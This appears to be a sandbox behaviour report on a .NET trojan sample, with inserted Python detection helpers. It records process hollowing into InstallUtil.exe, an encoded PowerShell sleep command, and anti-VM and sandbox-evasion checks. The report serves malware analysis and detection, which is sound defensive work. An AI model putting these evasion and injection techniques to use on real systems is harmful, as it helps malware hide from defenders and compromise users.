Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.444228433.0000000003D98000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFlagships.exe" vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.446019562.0000000005364000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFlagships.exe" vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.444228433.0000000003CA1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFlagships.exe" vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.441415964.000000000103B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.446019562.00000000052F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFlagships.exe" vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000000.301663644.00000000007E2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHpzplthjq.exe" vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.452585400.0000000006420000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameVxzadyg.dll" vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Binary or memory string: OriginalFilenameHpzplthjq.exe" vs SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe ReversingLabs: Detection: 27%
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Virustotal: Detection: 28%
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANQAwAA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANQAwAA==
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe.log
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwckm2bh.1q1.ps1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/6@1/2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe File read: C:\Users\user\Desktop\desktop.ini
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1380:120:WilError_01
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe String found in binary or memory: .aoskapplication/x-nokia-9000-communicator-add-on-software
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe String found in binary or memory: .help-application/x-helpfile
Source: 5.2.InstallUtil.exe.400000.0.unpack, BLU0uvm7cbHMajMVVfY/k0rhtnmCjVGhuZMMWlj.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static file information: File size 1575424 > 1048576
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x180000
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: .pdb source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000003.439138861.0000000006741000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.454352161.0000000007870000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

barindex
Source: 5.2.InstallUtil.exe.400000.0.unpack, BLU0uvm7cbHMajMVVfY/k0rhtnmCjVGhuZMMWlj.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E9DF3 push esp; retn 0002h 0_2_050EA021
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Code function: 0_2_050E50DC push eax; ret 0_2_050E50E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030B6DEA push edx; ret 5_2_030B6DEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030E3F08 pushfd ; ret 5_2_030E43F9
Source: 5.2.InstallUtil.exe.400000.0.unpack, BLU0uvm7cbHMajMVVfY/k0rhtnmCjVGhuZMMWlj.cs High entropy of concatenated method names: '.cctor', 'W0geRGAaPA', 'uspmmMmBiE', 'MG9mtRqDb3', 'QH0mR1EQ8l', 'rQZmPXqm5l', 'maTmkV0Dg1', 'IvvmsHGal6', 'WssmUtnmUl', '.ctor'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe TID: 3716 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1876 Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5732 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656 Thread sleep count: 4700 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6660 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9365
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 4700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: InstallUtil.exe, 00000005.00000003.540278400.0000000001556000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
Source: InstallUtil.exe, 00000005.00000003.540278400.0000000001556000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareXFNEXFFVWin32_VideoControllerV8BCVX2PVideoController120060621000000.000000-00041046991display.infMSBDA93K5C4FUPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsE3BD5Y8G
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.441415964.00000000010EA000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.567413487.0000000001557000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000003.540278400.0000000001556000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030EF720 LdrInitializeThunk, 5_2_030EF720
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43A000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 10B9008
Source: 5.2.InstallUtil.exe.400000.0.unpack, Mapping.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 5.2.InstallUtil.exe.400000.0.unpack, BLU0uvm7cbHMajMVVfY/k0rhtnmCjVGhuZMMWlj.cs Reference to suspicious API methods: ('G7tmpYI9ot', 'LoadLibrary@kernel32'), ('lS1mLKP3fJ', 'GetProcAddress@kernel32')
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process created: Base64 decoded start-sleep -seconds 50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
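The write sequence recorded above is the process-hollowing shape: PE headers (4D5A) written at InstallUtil.exe's image base 0x400000, further page-aligned writes inside that image (0x402000, 0x43A000, 0x444000) for the sections, and one small write far away at 0x10B9008. The Python below is an added example, not Joe Sandbox output or code from the sample; its event list is constructed from the report's "Memory written" lines. Two assumptions are built in and labelled in the code: the injected image is taken to span at most 0x100000 bytes from 0x400000 (the report gives no SizeOfImage), and a write landing 8 bytes into a page is treated as a candidate patch of PEB.ImageBaseAddress, which sits at offset 8 in the 32-bit PEB (the target is the 32-bit Framework InstallUtil.exe; on the 64-bit PEB the field is at 0x10). The report records only the writes, not the API sequence behind them, so the heuristic works on addresses alone.

```python
"""Triage of cross-process memory writes for the hollowing shape recorded above.
Added example with constructed events modelled on the report's 'Memory written'
lines; not Joe Sandbox code."""
from collections import defaultdict

PAGE = 0x1000
# Assumption: 32-bit PEB, where ImageBaseAddress is at offset 8 (0x10 on the
# 64-bit PEB).  A hollowing loader patches it so the new image base is used.
PEB_IMAGE_BASE_OFFSET = 0x8


def classify_write(base, image_base, image_size, first_bytes=b""):
    """Label one write by where it lands relative to the target's image."""
    if base == image_base and first_bytes[:2] == b"MZ":
        return "pe_headers_at_image_base"
    if image_base <= base < image_base + image_size:
        return "inside_image" if base % PAGE == 0 else "inside_image_unaligned"
    if base % PAGE == PEB_IMAGE_BASE_OFFSET:
        return "possible_peb_imagebase_patch"
    return "outside_image"


def triage_memory_writes(events, image_base=0x400000, image_size=0x100000):
    """Group writes by (source, target) and decide per pair whether a PE image
    was planted at image_base.  image_size is an assumed upper bound; the
    report does not state the injected image's SizeOfImage."""
    by_pair = defaultdict(list)
    for ev in events:
        by_pair[(ev["source"], ev["target"])].append(ev)
    verdicts = {}
    for pair, writes in by_pair.items():
        kinds = [classify_write(w["base"], image_base, image_size, w.get("first_bytes", b""))
                 for w in writes]
        verdicts[pair] = {
            "hollowing": "pe_headers_at_image_base" in kinds,
            "peb_patch": "possible_peb_imagebase_patch" in kinds,
            "kinds": kinds,
        }
    return verdicts


SRC = r"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe"
DST = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
# Constructed from the report; only the 0x400000 write has its leading bytes recorded.
SAMPLE_WRITES = [
    {"source": SRC, "target": DST, "base": 0x400000, "first_bytes": b"MZ"},
    {"source": SRC, "target": DST, "base": 0x402000},
    {"source": SRC, "target": DST, "base": 0x43A000},
    {"source": SRC, "target": DST, "base": 0x444000},
    {"source": SRC, "target": DST, "base": 0x10B9008},
]

if __name__ == "__main__":
    for pair, verdict in triage_memory_writes(SAMPLE_WRITES).items():
        print(pair[1], verdict)
```

The verdict for this sample's pair is hollowing plus a PEB patch candidate; a write at 0x10B9008 classified on its own would be unremarkable, which is why the grouping by source/target pair matters.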
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANQAwAA==
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
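The two launch records above (an -ENC blob handed to powershell.exe, and InstallUtil.exe started with no arguments by the sample) are what a process-creation triage should flag. The Python below is an added example, not Joe Sandbox or sample code; the event dicts are constructed from the report's lines in a Sysmon-like shape, and the third, benign control event is invented. One caveat from the report itself: the executed image is SysWOW64\...\powershell.exe although the command line names System32, because the 32-bit parent is subject to WOW64 file-system redirection, so match on the resolved image path rather than the path in the command line.

```python
"""Process-creation triage for the launch patterns recorded above: an encoded
PowerShell command and InstallUtil.exe run with no arguments.  Added example,
not code from the report or the sample; SAMPLE_EVENTS are constructed."""
import base64
import binascii
import re

# A switch token followed by a value: "-ENC <base64>", "-e <base64>", ...
_SWITCH = re.compile(r"(?<!\S)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]+)")


def _is_encoded_switch(flag: str) -> bool:
    # powershell.exe accepts the documented short forms -e and -ec and any
    # prefix of -EncodedCommand, case-insensitively.
    flag = flag.lower()
    return flag == "ec" or (flag.startswith("e") and "encodedcommand".startswith(flag))


def decode_encoded_command(cmdline: str):
    """Return the script behind -EncodedCommand, or None if there is none.

    The blob is base64 over UTF-16LE text, which is why a naive UTF-8 decode
    shows NUL-interleaved characters."""
    for m in _SWITCH.finditer(cmdline):
        if not _is_encoded_switch(m.group(1)):
            continue
        try:
            return base64.b64decode(m.group(2), validate=True).decode("utf-16le")
        except (binascii.Error, UnicodeDecodeError):
            return None
    return None


def _has_arguments(cmdline: str) -> bool:
    # The first token (quoted or bare) is the image; anything after it is an argument.
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)$', cmdline, re.S)
    return bool(m and m.group(1).strip())


def triage_process_creation(events):
    """Return (finding, parent, detail) tuples.  Each event is a dict with
    'parent', 'image' and 'cmdline' keys."""
    findings = []
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if image == "powershell.exe":
            script = decode_encoded_command(ev["cmdline"])
            if script is not None:
                findings.append(("encoded_command", ev["parent"], script))
                if re.search(r"(?i)\bstart-sleep\b", script):
                    findings.append(("sandbox_sleep", ev["parent"], script))
        elif image == "installutil.exe" and not _has_arguments(ev["cmdline"]):
            # Legitimate use passes an assembly path; a bare launch from a
            # user-writable parent is the hollowing target seen in this report.
            findings.append(("installutil_no_args", ev["parent"], ev["cmdline"]))
    return findings


# Constructed from the report's process-creation lines; the third event is an
# invented benign control.
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC '
                "cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANQAwAA=="},
    {"parent": r"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\svc\MyService.exe"},
]

if __name__ == "__main__":
    for finding in triage_process_creation(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed events, the blob from the report decodes to `start-sleep -seconds 50`, matching the report's own "Base64 decoded" line, and the bare InstallUtil.exe launch is flagged while the control launch with an assembly argument is not.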
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
